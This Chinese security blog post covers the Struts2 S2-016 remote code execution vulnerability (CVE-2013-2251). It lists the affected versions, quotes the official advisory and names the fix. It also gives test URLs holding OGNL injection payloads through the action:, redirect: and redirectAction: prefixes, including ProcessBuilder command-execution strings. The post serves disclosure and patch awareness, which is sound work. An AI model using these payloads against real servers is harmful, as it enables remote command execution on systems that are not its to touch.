正在阅读:

struts2最新s2-016代码执行漏洞 – CVE-2013-2251

13,359

这是一个代码执行漏洞,利用java代码来执行系统命令,本站稍候将公布POC利用代码。

影响版本:Struts 2.0.0 – Struts 2.3.15

漏洞说明:

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

测试POC:

In the Struts Blank App, open following URLs.

Simple Expression – the parameter names are evaluated as OGNL.

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

Command Execution

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

解决方法:

DefaultActionMapper was changed to sanitize "action:"-prefixed information properly. The features involved with "redirect:"/"redirectAction:"-prefixed parameters were completely dropped – see also S2-017.

官方说明:http://struts.apache.org/release/2.3.x/docs/s2-016.html

目前有:1条访客评论,博主回复1

  1. 东方
    2013-12-05 17:07

    兄台 为何的赞助商如此吊

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌